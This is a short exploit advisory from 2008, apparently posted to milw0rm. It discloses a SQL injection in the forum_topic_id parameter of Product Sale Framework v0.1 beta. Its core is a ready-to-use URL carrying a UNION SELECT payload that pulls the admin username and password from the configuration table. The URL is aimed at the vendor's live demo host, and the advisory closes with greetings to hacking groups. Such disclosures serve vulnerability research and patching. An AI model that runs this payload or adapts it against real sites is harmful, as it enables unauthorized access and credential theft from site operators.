52 lines
No EOL
2.2 KiB
Text
52 lines
No EOL
2.2 KiB
Text
+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
|
|
+ +
|
|
+ Product Sale Framework sql injection Vulnerability +
|
|
+ +
|
|
+ Discovered by b3hz4d +
|
|
+ +
|
|
+ WwW.DeltaHacking.Net +
|
|
+ +
|
|
+ +
|
|
+ +
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
|
|
APA Center of Yazd University
|
|
(https://www.ircert.cc)
|
|
|
|
|
|
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
|
|
DATE : 06 Dec 2008
|
|
SITE : WwW.DeltaHacking.Net
|
|
CONTACT: behzad_sh_66@yahoo.com
|
|
|
|
#####################################################
|
|
|
|
APPLICATION : Product Sale Framework v0.1 beta
|
|
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
|
|
VENDOR : http://www.productsaleframework.com
|
|
DEMO (links) : http://www.productsaleframework.com
|
|
|
|
#####################################################
|
|
|
|
|
|
[+] vuln :
|
|
customer.forumtopic.php
|
|
|
|
vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
|
|
|
|
http://www.productsaleframework.com/
|
|
|
|
[+] Exploit :
|
|
Admin Username and Password:
|
|
|
|
http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
|
|
|
|
|
|
##########################################################################################################
|
|
|
|
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
|
|
|
|
##########################################################################################################
|
|
|
|
# milw0rm.com [2008-12-07] |